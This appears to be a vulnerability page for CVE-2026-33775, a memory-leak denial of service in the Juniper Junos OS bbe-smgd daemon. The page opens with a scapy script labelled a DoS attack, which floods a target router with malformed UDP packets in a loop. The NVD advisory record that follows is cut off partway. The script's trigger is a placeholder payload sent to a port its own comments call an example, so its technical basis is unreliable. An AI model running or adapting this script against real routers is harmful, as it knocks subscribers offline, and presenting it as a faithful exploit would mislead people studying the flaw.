CVE-2026-33775

from scapy.all import * import time # Configuration # Target IP of the Juniper MX device target_ip = "192.168.1.1" # Port used by bbe-smgd (Needs specific reconnaissance, example port) target_port = 2000 interface = "eth0" def send_malicious_packet(): # Construct a packet that does not match the expected 'authentication packet-type' # This simulates the trigger condition for the memory leak packet = IP(dst=target_ip)/UDP(dport=target_port)/Raw(load="MALFORMED_AUTH_PAYLOAD") print(f"[*] Sending packet to {target_ip}...") send(packet, iface=interface, verbose=0) print("[+] Starting DoS simulation for CVE-2026-33775") print("[!] This will consume memory in bbe-smgd if the vulnerability is unpatched.") try: while True: send_malicious_packet() # Short delay to avoid flooding the network too hard, but enough to leak memory time.sleep(0.1) except KeyboardInterrupt: print("\n[-] Attack stopped.")

{"cve": {"id": "CVE-2026-33775", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:26.020", "lastModified": "2026-04-17T17:40:50.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Missing Release of Memory after Effective Lifetime vulnerability in the BroadBand Edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS).\n\nIf the authentication packet-type option is configured and a received packet does not match that packet type, the memory leak occurs. When all memory \n\navailable to bbe-smgd has been consumed, no new subscribers will be able to login.\n\nThe memory utilization of bbe-smgd can be monitored with the following show command:\n\nuser@host> show system processes extensive | match bbe-smgd\n\nThe below log message can be observed when this limit has been reached:\n\nbbesmgd[<PID>]: %DAEMON-3-SMD_DPROF_RSMON_ERROR: Resource unavailability, Reason: Daemon Heap Memory exhaustion\n\n\nThis issue affects Junos OS on MX Series:\n * all versions before 22.4R3-S8,\n * 23.2 versions before 23.2R2-S5,\n * 23.4 versions before 23.4R2-S6,\n * 24.2 versions before 24.2R2-S2,\n * 24.4 versions before 24.4R2,\n * 25.2 versions before 25.2R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:M/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "57F66641-003B-49D6-A9B9-AB300CFE3C93"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "1379EF30-AF04-4F98-8328-52A631F24737"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "28E42A41-7965-456B-B0AF-9D3229CE4D4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "CB1A77D6-D3AD-481B-979C-8F778530B175"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "3A064B6B-A99B-4D8D-A62D-B00C7870BC30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2:*:*:*:*:*:*", "matchCriteriaId": "40813417-A938-4F74-A419-8C5188A35486"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "7FC1BA1A-DF0E-4B15-86BA-24C60E546732"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "EBB967BF-3495-476D-839A-9DBFCBE69F91"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r3:*:*:*:*:*:*", "matchCriteriaId": "7E5688D6-DCA4-4550-9CD1-A3D792252129"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "84945 ... (truncated)